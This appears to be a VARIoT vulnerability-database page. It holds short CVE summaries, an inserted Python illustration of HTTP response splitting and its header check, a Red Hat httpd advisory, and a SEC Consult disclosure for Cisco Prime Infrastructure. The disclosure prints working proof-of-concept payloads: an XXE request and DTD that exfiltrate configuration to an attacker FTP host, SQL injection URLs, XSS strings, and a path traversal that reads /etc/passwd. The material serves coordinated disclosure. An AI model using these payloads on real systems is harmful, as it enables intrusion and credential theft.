VARIoT IoT vulnerabilities database
| VAR-201706-1141 | No CVE | dLAN 200 AVeasy unauthorized access vulnerability | CVSS V2: 5.0 | CVSS V3: - | Severity: MEDIUM |
dLAN 200 AVeasy is a network device from Germany that turns the home power grid into a convenient data network.
dLAN 200 AVeasy has an unauthorized access vulnerability that allows an attacker to bypass permission authentication, access sensitive directories or files, and obtain sensitive information.
| VAR-201808-0004 | CVE-2016-4975 | Vulnerability in Cosminexus HTTP Server and Hitachi Web Server | CVSS V2: 4.3 | CVSS V3: 6.1 | Severity: MEDIUM |
Possible CRLF injection allowing HTTP response splitting attacks for sites which use mod_userdir. This issue was mitigated by changes made in 2.4.25 and 2.2.32 which prohibit CR or LF injection into the "Location" or other outbound header key or value. Fixed in Apache HTTP Server 2.4.25 (Affected 2.4.1-2.4.23). Fixed in Apache HTTP Server 2.2.32 (Affected 2.2.0-2.2.31).
Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid various attacks that try to give client users a false sense of trust.
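As an added illustration (not code from the VARIoT entry or from Apache httpd), the following Python models a mod_userdir-style redirect and the outbound-header CR/LF check that the 2.4.25/2.2.32 fix describes; the serializer, host name and sample path are constructed assumptions.

```python
from urllib.parse import unquote

# Constructed sample inputs (assumptions, not taken from any real request):
# a /~user path that smuggles an encoded CRLF pair and a forged second response,
# and a benign path for comparison.
SPLIT_PATH = ("/~alice%0d%0aContent-Length:%200%0d%0a%0d%0a"
              "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a"
              "<html>forged</html>")
CLEAN_PATH = "/~alice"


def userdir_redirect(decoded_path: str) -> dict:
    """Location header a userdir-style handler emits when /~user lacks a
    trailing slash. The path is already URL-decoded, so CR/LF may be present."""
    return {"Location": f"http://example.invalid{decoded_path}/"}


def serialize_response(status: str, headers: dict, body: str) -> str:
    """Naive serializer: header values are interpolated verbatim, so a CR/LF
    inside a value ends the header block early (the vulnerable behaviour)."""
    lines = [f"HTTP/1.1 {status}"] + [f"{k}: {v}" for k, v in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def check_outbound_header(key: str, value: str) -> None:
    """Reject any CR or LF in an outbound header key or value, which is the
    rule the fixed releases enforce for Location and other headers."""
    for part_name, part in (("key", key), ("value", value)):
        if "\r" in part or "\n" in part:
            raise ValueError(f"CR/LF in outbound header {part_name}: {part!r}")


def serialize_response_hardened(status: str, headers: dict, body: str) -> str:
    """Same serializer, but every header is validated before it is written."""
    for key, value in headers.items():
        check_outbound_header(key, value)
    return serialize_response(status, headers, body)


def count_responses(raw: str) -> int:
    """Number of status lines in the serialized bytes; 2 means a split."""
    return raw.count("HTTP/1.1 ")


def demo_naive() -> str:
    """Vulnerable path: the decoded CRLF splits the response in two."""
    return serialize_response("302 Found", userdir_redirect(unquote(SPLIT_PATH)), "")


def demo_hardened_rejects() -> bool:
    """Hardened path: the same input is refused before anything is written."""
    try:
        serialize_response_hardened("302 Found",
                                    userdir_redirect(unquote(SPLIT_PATH)), "")
    except ValueError:
        return True
    return False


def demo_hardened_clean() -> str:
    """A benign path still serializes to exactly one response."""
    return serialize_response_hardened("302 Found",
                                       userdir_redirect(unquote(CLEAN_PATH)), "")
```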
| VAR-201706-1185 | No CVE | ARRIS VAP2500 assoc_table Command Injection Remote Code Execution Vulnerability | CVSS V2: 9.0 | CVSS V3: - | Severity: HIGH |
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ARRIS VAP2500. Authentication is required to exploit this vulnerability. The specific flaw exists within the handling of the various txt_mac parameters provided to the config_wds.php management portal page. The issue lies in the failure to properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.
| VAR-201706-1186 | No CVE | ARRIS VAP2500 list_mac_address Authentication Bypass Remote Code Execution Vulnerability | CVSS V2: 10.0 | CVSS V3: - | Severity: HIGH |
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ARRIS VAP2500. Authentication is not required to exploit this vulnerability. The specific flaw exists within the authentication validation mechanism used in the list_mac_address.php management portal page. The issue lies in the failure to stop processing the page after an unsuccessful attempt to validate authentication. An attacker can leverage this vulnerability to execute code in the context of root.
| VAR-201706-0017 | CVE-2016-8493 | Fortinet FortiClient for Windows vulnerability related to authorization, privileges, and access control | CVSS V2: 9.0 | CVSS V3: 8.8 | Severity: HIGH |
In FortiClient Windows 5.4.1 and 5.4.2, an attacker may escalate privilege via a FortiClientNamedPipe vulnerability. Fortinet FortiClient for Windows contains vulnerabilities related to authorization, privileges, and access control. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Fortinet FortiClient is prone to a privilege-escalation vulnerability.
An attacker can exploit this issue to execute arbitrary code with elevated privileges.
FortiClient 5.4.1 and 5.4.2 are vulnerable. Fortinet FortiClient is a mobile endpoint security solution developed by Fortinet. The solution provides IPsec and SSL encryption, WAN optimization, endpoint compliance, and two-factor authentication when connected to FortiGate firewall appliances.
| VAR-201711-0981 | CVE-2017-8143 | Huawei Honor 5C and P9 Lite smartphone software input validation vulnerability | CVSS V2: 7.1 | CVSS V3: 5.5 | Severity: MEDIUM |
The Wi-Fi driver of Huawei Honor 5C and P9 Lite smartphones with software versions earlier than NEM-L21C432B351 and earlier than VNS-L21C10B381 has a DoS vulnerability. An attacker may trick a user into installing a malicious application, and the application can access an invalid driver address to crash the system. Huawei Honor 5C and P9 Lite are both Huawei smartphone products. Huawei's mobile Wi-Fi driver has a denial of service vulnerability. Huawei smartphones are prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the system, resulting in a denial-of-service condition.
| VAR-201706-1112 | No CVE | iOffice system SQL injection vulnerability in the WSLoginMobile.asmx?wsdl parameter | CVSS V2: 7.8 | CVSS V3: - | Severity: HIGH |
The Hongfan iOffice system is based on Microsoft's .NET technology. It is a mobile information system for portable terminals such as notebooks and mobile phones.
There is a SQL injection vulnerability in the WSLoginMobile.asmx?wsdl parameter of the iOffice system. The vulnerability is caused by a failure to effectively filter user-submitted data, allowing attackers to use it to obtain sensitive database information.
| VAR-201706-1009 | CVE-2017-9828 | Multiple VIVOTEK Network Camera products: shell command injection in the web service's /cgi-bin/admin/testserver.cgi | CVSS V2: 10.0 | CVSS V3: 9.8 | Severity: CRITICAL |
'/cgi-bin/admin/testserver.cgi' of the web service in most VIVOTEK Network Cameras is vulnerable to shell command injection, which allows remote attackers to execute any shell command as root via a crafted HTTP request. This vulnerability has been verified on VIVOTEK Network Camera IB8369/FD8164/FD816BA; most others have similar firmware that may be affected. An attack uses shell metacharacters in the senderemail parameter. VIVOTEK Network Cameras IB8369, FD8164 and FD816BA are all network camera products of China VIVOTEK. A security vulnerability exists in the /cgi-bin/admin/testserver.cgi file of the web service in VIVOTEK Network Cameras IB8369, FD8164, and FD816BA.
| VAR-201706-1010 | CVE-2017-9829 | Multiple VIVOTEK Network Camera products: arbitrary file read via the web service's /cgi-bin/admin/downloadMedias.cgi | CVSS V2: 5.0 | CVSS V3: 7.5 | Severity: HIGH |
'/cgi-bin/admin/downloadMedias.cgi' of the web service in most VIVOTEK Network Cameras is vulnerable, which allows remote attackers to read any file on the camera's Linux filesystem via a crafted HTTP request containing ".." sequences. This vulnerability has been verified on VIVOTEK Network Camera IB8369/FD8164/FD816BA; most others have similar firmware that may be affected. VIVOTEK Network Cameras IB8369, FD8164 and FD816BA are all network camera products of China VIVOTEK.
| VAR-201706-0485 | CVE-2017-2780 | InsideSecure MatrixSSL buffer error vulnerability | CVSS V2: 7.5 | CVSS V3: 9.8 | Severity: CRITICAL |
An exploitable heap buffer overflow vulnerability exists in the X509 certificate parsing functionality of InsideSecure MatrixSSL 3.8.7b. A specially crafted x509 certificate can cause a buffer overflow on the heap resulting in remote code execution. To trigger this vulnerability, a specially crafted x509 certificate must be presented to the vulnerable client or server application when initiating a secure connection. InsideSecure MatrixSSL contains a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Inside Secure MatrixSSL is an IoT application toolkit from the French company Inside Secure, which implements TLS and DTLS in a modular way. MatrixSSL is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will result in denial-of-service conditions.
MatrixSSL 3.8.7b is vulnerable; other versions may also be affected.
| VAR-201706-0487 | CVE-2017-2782 | InsideSecure MatrixSSL integer overflow vulnerability | CVSS V2: 6.4 | CVSS V3: 9.1 | Severity: CRITICAL |
An integer overflow vulnerability exists in the X509 certificate parsing functionality of InsideSecure MatrixSSL 3.8.7b. A specially crafted x509 certificate can cause a length counter to overflow, leading to a controlled out-of-bounds copy operation. To trigger this vulnerability, a specially crafted x509 certificate must be presented to the vulnerable client or server application when initiating a secure connection. InsideSecure MatrixSSL contains an integer overflow vulnerability. Information may be obtained and service operation may be interrupted (DoS). Inside Secure MatrixSSL is an IoT application toolkit from the French company Inside Secure, which implements TLS and DTLS in a modular way. MatrixSSL is prone to multiple buffer-overflow vulnerabilities.
Attackers can exploit these issues to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions.
MatrixSSL 3.8.7b is vulnerable; other versions may also be affected.
| VAR-201706-0357 | CVE-2017-3747 | Lenovo Nerve Center for Windows 10 on desktop systems privilege escalation vulnerability | CVSS V2: 2.1 | CVSS V3: 5.5 | Severity: MEDIUM |
Privilege escalation vulnerability in Lenovo Nerve Center for Windows 10 on desktop systems (Lenovo Nerve Center for notebook systems is not affected) that could allow an attacker with local privileges on a system to alter registry keys. Lenovo Y900 and other models are Lenovo notebook products. Nerve Center for Windows 10 is performance control software for Windows 10 systems. There is a local privilege escalation vulnerability in Lenovo Nerve Center. An attacker could use this vulnerability to alter registry keys.
| VAR-201706-0486 | CVE-2017-2781 | InsideSecure MatrixSSL buffer error vulnerability | CVSS V2: 7.5 | CVSS V3: 9.8 | Severity: CRITICAL |
An exploitable heap buffer overflow vulnerability exists in the X509 certificate parsing functionality of InsideSecure MatrixSSL 3.8.7b. A specially crafted x509 certificate can cause a buffer overflow on the heap resulting in remote code execution. To trigger this vulnerability, a specially crafted x509 certificate must be presented to the vulnerable client or server application when initiating a secure connection. InsideSecure MatrixSSL contains a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Inside Secure MatrixSSL is an IoT application toolkit from the French company Inside Secure, which implements TLS and DTLS in a modular way. MatrixSSL is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will result in denial-of-service conditions.
MatrixSSL 3.8.7b is vulnerable; other versions may also be affected.
| VAR-201707-0908 | CVE-2017-6698 | Cisco PI and EPNM SQL database interface SQL injection vulnerability | CVSS V2: 5.5 | CVSS V3: 5.4 | Severity: MEDIUM |
A vulnerability in the Cisco Prime Infrastructure (PI) and Evolved Programmable Network Manager (EPNM) SQL database interface could allow an authenticated, remote attacker to impact the confidentiality and integrity of the application by executing arbitrary SQL queries, aka SQL Injection. More Information: CSCvc23892 CSCvc35270 CSCvc35626 CSCvc35630 CSCvc49568. Known Affected Releases: 3.1(1) 2.0(4.0.45B). The vendor has confirmed this vulnerability and published it as Bug IDs CSCvc23892, CSCvc35270, CSCvc35626, CSCvc35630 and CSCvc49568. Information may be obtained and altered.
An attacker can leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue is tracked by Cisco Bug IDs CSCvc23892, CSCvc35270, CSCvc35626, CSCvc35630 and CSCvc49568. PI is a wireless management solution built on Cisco Prime LAN Management Solution (LMS) and Cisco Prime Network Control System (NCS) technologies; EPNM is a network management solution. A remote attacker could exploit this vulnerability by sending URLs containing malicious SQL statements to the affected application, affecting its integrity and confidentiality.
SEC Consult Vulnerability Lab Security Advisory < 20170622-0 >
=======================================================================
title: XML External Entity Injection (XXE),
SQL Injection, Cross Site Scripting,
Local File Disclosure
product: Cisco Prime Infrastructure
vulnerable version: 1.1 through 3.1.6
fixed version: 3.1.6 Update 1 (patch), 3.1.7 (future release)
CVE number: CVE-2017-6662, CVE-2017-6698, CVE-2017-6699, CVE-2017-6700
impact: high
homepage:
http://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html
found: 2016-11-21
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Cisco Systems, Inc. (known as Cisco) is an American multinational technology
conglomerate headquartered in San José, California, that develops,
manufactures, and sells networking hardware, telecommunications equipment,
and other high-technology services and products. Through its numerous acquired
subsidiaries, such as OpenDNS, Cisco Meraki, and Cisco Jasper,
Cisco specializes into specific tech markets, such as Internet of Things (IoT),
domain security, and energy management."
Source: https://en.wikipedia.org/wiki/Cisco_Systems
Business recommendation:
------------------------
SEC Consult recommends installing the latest patch to fix the identified
vulnerabilities. Furthermore, Cisco Prime Infrastructure should be
reachable only from trusted internal networks and/or whitelisted IP addresses.
Since SEC Consult only performed a short security crash test on this product
it is highly recommended to perform a thorough security review as there are
indications for further vulnerabilities.
Vulnerability overview/description:
-----------------------------------
SEC Consult was able to identify some serious vulnerabilities with the
low privileged "monitor-only" user.
1) XML External Entity Injection (CVE-2017-6662)
The XML parser in use resolves external XML entities, which allows attackers
to read files and send requests to systems on the internal network (e.g. port
scanning).
The vulnerability can be exploited by a low privileged read-only user
to read sensitive files with malicious XML code.
2) SQL Injection (CVE-2017-6698)
The hashed password of the local admin user can be accessed without
authorization.
3) Cross site scripting (CVE-2017-6699, CVE-2017-6700)
Due to the lack of input validation, an attacker can insert malicious JavaScript
code to be executed under a victim's browser context.
4) Local File Disclosure (no CVE assigned)
Because of insufficient input validation, arbitrary local files can be
disclosed. Files that include passwords and other sensitive information can
be accessed.
Proof of concept:
-----------------
1) XML External Entity Injection (CVE-2017-6662)
Login with a low privileged user and navigate to Settings > Export >
select Format 'PDF' click 'Export'.
Make sure the 'Chart' option is selected, this chart uses XML to build SVG
images.
POST /webacs/prime/ui/dashboard/renderer HTTP/1.1
Host: <CiscoPrimeHost>
[...]
output-type=pdf&content={"applicationName":"sectest","reportName":"Site","options":{},"timezoneOffset":0,"items":[{"options":{"filters":[],"additionalInfo":[""]},"svgSurface":{"svg":"<%3fxml+version%3d\"1.0\"+encoding%3d\"UTF-8\"%3f><!DOCTYPE
x [<!ENTITY %25 foo SYSTEM
\"http://<AttackerHost>:1234/sectest.dtd\">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]><svg+xmlns%3alink%3d\"http%3a//www.w3.org/1999/xlink\"+xmlns%3d\"http%3a//www.w3.org/2000/svg\"><defs/><text>%26%65%78%66%69%6c%3b</text></svg>","dims"%3a{"width"%3a0,"height"%3a0}},"csv"%3a"Devices,\"","title"%3a"","timestamp"%3a""}],"noBrandingData"%3atrue,"locale"%3a"en"}&pdfOptions=%7B%22table%22%3Atrue%2C%22chart%22%3Atrue%7D
$ cat sectest.dtd
<!ENTITY % data SYSTEM "file:///storedconfig/active/startup-config">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://<Attacker>:2121/%data;'>">
$ python -m SimpleHTTPServer 1234
$ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb
$ ruby xxe-ftp-server.rb
FTP. New client connected
< USER anonymous
< PASS Java1.8.0_66@
> 230 more data please!
< TYPE I
> 230 more data please!
< CWD !
> 230 more data please!
< hostname <CiscoPrimeHost>
[...]
< !
> 230 more data please!
< username admin password hash <AdminHashedPassword>
> 230 more data please!
< CWD role admin
> 230 more data please!
< !
[...]
2) SQL Injection (CVE-2017-6698)
A low privileged user such as "monitor-only" user can read the admin's
password hashes via SQL injection.
https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/PI_RECENT_LINKS?categoryPath=global%2fPI_RECENT_LINKS<SQL-Injection>
https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/syslog_viewer_tutorial?categoryPath=<SQL-Injection>
https://<CiscoPrimeHost>/webacs/rs/device-rest/getfiltercriteria/device?start=0&count=100&id=<SQL-Injection>&path=%2Froot
Some vulnerable entry points require administrator privileges to exploit.
https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/PI_HOME_PAGE_SELECTION?categoryPath=<SQL-Injection>
https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/corelated-right-tabs?categoryPath=<SQL-Injection>
https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/DASHBOARD_CONFIG:com_cisco_xmp_web_page_smartlicense_dashboard?categoryPath=<SQL-Injection>
https://<CiscoPrimeHost>/webacs/rs/json/userService/getAuditRecordsForGivenRange/?userName=/<SQL-Injection>&ipAddress=/<SQL-Injection>&time=/<SQL-Injection>&auditDescription=/<SQL-Injection>&userGroup=/<SQL-Injection>&activeDomain=/<SQL-Injection>
https://<CiscoPrimeHost>/webacs/inventoryRestService/ifm/inventory-rest/getImportTaskStatusDTO/<SQL-Injection>
https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getJobDetails/<SQL-Injection>
https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getAllJobsCtr/Infrastructure/<SQL-Injection>
https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getAllJobs/<SQL-Injection>/Lightweight%20AP%20Operational%20Status
Some URLs with this pattern are affected by the SQL injection vulnerability
in the JSON field.
https://<CiscoPrimeHost>/webacs/rs/preferences/systemPreferencesForNode/default.proxy/
(HTTP POST)
{
"items": [
"<SQL-Injection>",
"ProxyPort",
"ProxyUserName",
"ProxyPassword",
"isProxyEnabled",
"isProxyAuthenticated"
]
}
https://<CiscoPrimeHost>/webacs/rs/preferences/systemPreferencesForNode/default.swim/
(HTTP POST)
{
"items": [
"<SQL-Injection>",
"CCOPassword"
]
}
3) Cross site scripting
a) Reflected cross site scripting (CVE-2017-6699)
https://<CiscoPrimeHost>/webacs/applications/common/jsp/SystemPreferences_Configurable.jsp?taskName=<img+src=x+onerror=alert(/XSS1/)>&confUrl=</ScR</ScRipT>ipT><img+src=x+onerror=alert(/XSS2/)>
https://<CiscoPrimeHost>/webacs/applications/inventory/html/ImportJobResults.jsp?taskId=</sc</script>ript><img+src=x+onerror=alert(/XSS1/)>&jobResultPageId='><img+src=x+onerror=alert(/XSS2/)>
b) DOM-based cross site scripting (CVE-2017-6700)
https://<CiscoPrimeHost>/webacs/index_abs.jsp?theme=prime#pageId=com_cisco_ifm_ui_web_page_job_dashboard_import_view&taskId=<ExistingTaskID>&jobName="><img
src=x onerror=alert(/XSS/)>&pageSettings=
https://<CiscoPrimeHost>/webacs/loginAction.do?action=login&product=wcs&selectedCategory=en#pageId=com_cisco_ifm_ui_web_page_job_dashboard_detail_view&forceLoad=true&jobType=Infrastructure&workState=Scheduled&parentType=usrDefined&lastRunJobId=<ExistingJobId>&lastRunResultState=Success&jobId=<ExistingJobId>&jobName=Mobility
Service Status&jobBreadcrumName="><img src=x onerror=alert(/XSS/)>
4) Local File Disclosure
The attacker must be in the super users or admin group in order to exploit this
vulnerability.
https://<CiscoPrimeHost>/webacs/packetCaptureAction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd
GET
/webacs/packetCaptureAction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd
HTTP/1.1
Host: <CiscoPrimeHost>
[...]
HTTP/1.1 200 OK
Cache-Control: private
Expires: Thu, 01 Jan 1970 01:00:00 CET
Content-Disposition: attachement;
filename="../../../../../../../../../../../../../../../../../../../../etc/passwd.zip"
Content-Type: application/zip
[...]
$ unzip _.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._etc_passwd.zip
Archive: _.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._etc_passwd.zip
warning: skipped "../" path component(s) in
../../../../../../../../../../../../../../../../../../../../etc/passwd
inflating: etc/passwd
$ cat etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
[...]
Vulnerable / tested versions:
-----------------------------
According to information provided by Cisco, the following versions are affected:
1.1 through 3.1.6
SEC Consult tested the following versions which were the most recent ones at the
time of discovery:
* 3.1.0.0.70
* 3.1.0.0.132 incl. 3.1.4 patch
Vendor contact timeline:
------------------------
2016-11-23: Contacting vendor through psirt@cisco.com.
2016-11-23: Initial response from Cisco PSIRT.
2016-11-24: Additional vulnerabilities added.
2016-12-14: Cisco proposed target date for the fixes for March 2017.
2017-03-03: Cisco postponed target date for the fixes to 31 May 2017.
2017-05-16: Cisco postponed target date for the fixes to 21 June 2017.
2017-06-14: CVEs are assigned to the vulnerabilities.
2017-06-21: Patches available
2017-06-22: Coordinated release of security advisory.
Solution:
---------
Install the patch version 3.1.6 Update 1.
It ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Pichaya Morimoto / @2017
| VAR-201707-1241 | CVE-2017-9788 | Apache httpd security vulnerability | CVSS V2: 6.4 | CVSS V3: 9.1 | Severity: CRITICAL |
In Apache httpd before 2.2.34 and 2.4.x before 2.4.27, the value placeholder in [Proxy-]Authorization headers of type 'Digest' was not initialized or reset before or between successive key=value assignments by mod_auth_digest. Providing an initial key with no '=' assignment could reflect the stale value of uninitialized pool memory used by the prior request, leading to leakage of potentially confidential information, and a segfault in other cases resulting in denial of service. A security vulnerability exists in Apache httpd versions prior to 2.2.34 and 2.4.x versions prior to 2.4.27.
=====================================================================
Red Hat Security Advisory
Synopsis: Important: httpd24-httpd security update
Advisory ID: RHSA-2017:2483-01
Product: Red Hat Software Collections
Advisory URL: https://access.redhat.com/errata/RHSA-2017:2483
Issue date: 2017-08-16
CVE Names: CVE-2017-3167 CVE-2017-3169 CVE-2017-7659
CVE-2017-7668 CVE-2017-7679 CVE-2017-9788
=====================================================================
1. Summary:
An update for httpd24-httpd is now available for Red Hat Software
Collections.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
3. Description:
The httpd packages provide the Apache HTTP Server, a powerful, efficient,
and extensible web server.
Security Fix(es):
* It was discovered that the httpd's mod_auth_digest module did not
properly initialize memory before using it when processing certain headers
related to digest authentication. A remote attacker could possibly use this
flaw to disclose potentially sensitive information or cause httpd child
process to crash by sending specially crafted requests to a server.
(CVE-2017-9788)
* It was discovered that the use of httpd's ap_get_basic_auth_pw() API
function outside of the authentication phase could lead to authentication
bypass. A remote attacker could possibly use this flaw to bypass required
authentication if the API was used incorrectly by one of the modules used
by httpd. (CVE-2017-3167)
* A NULL pointer dereference flaw was found in the httpd's mod_ssl module.
A remote attacker could use this flaw to cause an httpd child process to
crash if another module used by httpd called a certain API function during
the processing of an HTTPS request. (CVE-2017-3169)
* A NULL pointer dereference flaw was found in the mod_http2 module of
httpd. A remote attacker could use this flaw to cause httpd child process
to crash via a specially crafted HTTP/2 request. (CVE-2017-7659)
* A buffer over-read flaw was found in the httpd's ap_find_token()
function. A remote attacker could use this flaw to cause httpd child
process to crash via a specially crafted HTTP request. (CVE-2017-7668)
* A buffer over-read flaw was found in the httpd's mod_mime module. A user
permitted to modify httpd's MIME configuration could use this flaw to cause
httpd child process to crash. (CVE-2017-7679)
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
After installing the updated packages, the httpd daemon will be restarted
automatically.
5. Bugs fixed (https://bugzilla.redhat.com/):
1463194 - CVE-2017-3167 httpd: ap_get_basic_auth_pw() authentication bypass
1463197 - CVE-2017-3169 httpd: mod_ssl NULL pointer dereference
1463199 - CVE-2017-7659 httpd: mod_http2 NULL pointer dereference
1463205 - CVE-2017-7668 httpd: ap_find_token() buffer overread
1463207 - CVE-2017-7679 httpd: mod_mime buffer overread
1470748 - CVE-2017-9788 httpd: Uninitialized memory reflection in mod_auth_digest
6. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source:
httpd24-httpd-2.4.25-9.el6.1.src.rpm
noarch:
httpd24-httpd-manual-2.4.25-9.el6.1.noarch.rpm
x86_64:
httpd24-httpd-2.4.25-9.el6.1.x86_64.rpm
httpd24-httpd-debuginfo-2.4.25-9.el6.1.x86_64.rpm
httpd24-httpd-devel-2.4.25-9.el6.1.x86_64.rpm
httpd24-httpd-tools-2.4.25-9.el6.1.x86_64.rpm
httpd24-mod_ldap-2.4.25-9.el6.1.x86_64.rpm
httpd24-mod_proxy_html-2.4.25-9.el6.1.x86_64.rpm
httpd24-mod_session-2.4.25-9.el6.1.x86_64.rpm
httpd24-mod_ssl-2.4.25-9.el6.1.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7):
Source:
httpd24-httpd-2.4.25-9.el6.1.src.rpm
noarch:
httpd24-httpd-manual-2.4.25-9.el6.1.noarch.rpm
x86_64:
httpd24-httpd-2.4.25-9.el6.1.x86_64.rpm
httpd24-httpd-debuginfo-2.4.25-9.el6.1.x86_64.rpm
httpd24-httpd-devel-2.4.25-9.el6.1.x86_64.rpm
httpd24-httpd-tools-2.4.25-9.el6.1.x86_64.rpm
httpd24-mod_ldap-2.4.25-9.el6.1.x86_64.rpm
httpd24-mod_proxy_html-2.4.25-9.el6.1.x86_64.rpm
httpd24-mod_session-2.4.25-9.el6.1.x86_64.rpm
httpd24-mod_ssl-2.4.25-9.el6.1.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source:
httpd24-httpd-2.4.25-9.el6.1.src.rpm
noarch:
httpd24-httpd-manual-2.4.25-9.el6.1.noarch.rpm
x86_64:
httpd24-httpd-2.4.25-9.el6.1.x86_64.rpm
httpd24-httpd-debuginfo-2.4.25-9.el6.1.x86_64.rpm
httpd24-httpd-devel-2.4.25-9.el6.1.x86_64.rpm
httpd24-httpd-tools-2.4.25-9.el6.1.x86_64.rpm
httpd24-mod_ldap-2.4.25-9.el6.1.x86_64.rpm
httpd24-mod_proxy_html-2.4.25-9.el6.1.x86_64.rpm
httpd24-mod_session-2.4.25-9.el6.1.x86_64.rpm
httpd24-mod_ssl-2.4.25-9.el6.1.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
httpd24-httpd-2.4.25-9.el7.1.src.rpm
noarch:
httpd24-httpd-manual-2.4.25-9.el7.1.noarch.rpm
x86_64:
httpd24-httpd-2.4.25-9.el7.1.x86_64.rpm
httpd24-httpd-debuginfo-2.4.25-9.el7.1.x86_64.rpm
httpd24-httpd-devel-2.4.25-9.el7.1.x86_64.rpm
httpd24-httpd-tools-2.4.25-9.el7.1.x86_64.rpm
httpd24-mod_ldap-2.4.25-9.el7.1.x86_64.rpm
httpd24-mod_proxy_html-2.4.25-9.el7.1.x86_64.rpm
httpd24-mod_session-2.4.25-9.el7.1.x86_64.rpm
httpd24-mod_ssl-2.4.25-9.el7.1.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3):
Source:
httpd24-httpd-2.4.25-9.el7.1.src.rpm
noarch:
httpd24-httpd-manual-2.4.25-9.el7.1.noarch.rpm
x86_64:
httpd24-httpd-2.4.25-9.el7.1.x86_64.rpm
httpd24-httpd-debuginfo-2.4.25-9.el7.1.x86_64.rpm
httpd24-httpd-devel-2.4.25-9.el7.1.x86_64.rpm
httpd24-httpd-tools-2.4.25-9.el7.1.x86_64.rpm
httpd24-mod_ldap-2.4.25-9.el7.1.x86_64.rpm
httpd24-mod_proxy_html-2.4.25-9.el7.1.x86_64.rpm
httpd24-mod_session-2.4.25-9.el7.1.x86_64.rpm
httpd24-mod_ssl-2.4.25-9.el7.1.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source:
httpd24-httpd-2.4.25-9.el7.1.src.rpm
noarch:
httpd24-httpd-manual-2.4.25-9.el7.1.noarch.rpm
x86_64:
httpd24-httpd-2.4.25-9.el7.1.x86_64.rpm
httpd24-httpd-debuginfo-2.4.25-9.el7.1.x86_64.rpm
httpd24-httpd-devel-2.4.25-9.el7.1.x86_64.rpm
httpd24-httpd-tools-2.4.25-9.el7.1.x86_64.rpm
httpd24-mod_ldap-2.4.25-9.el7.1.x86_64.rpm
httpd24-mod_proxy_html-2.4.25-9.el7.1.x86_64.rpm
httpd24-mod_session-2.4.25-9.el7.1.x86_64.rpm
httpd24-mod_ssl-2.4.25-9.el7.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2017-3167
https://access.redhat.com/security/cve/CVE-2017-3169
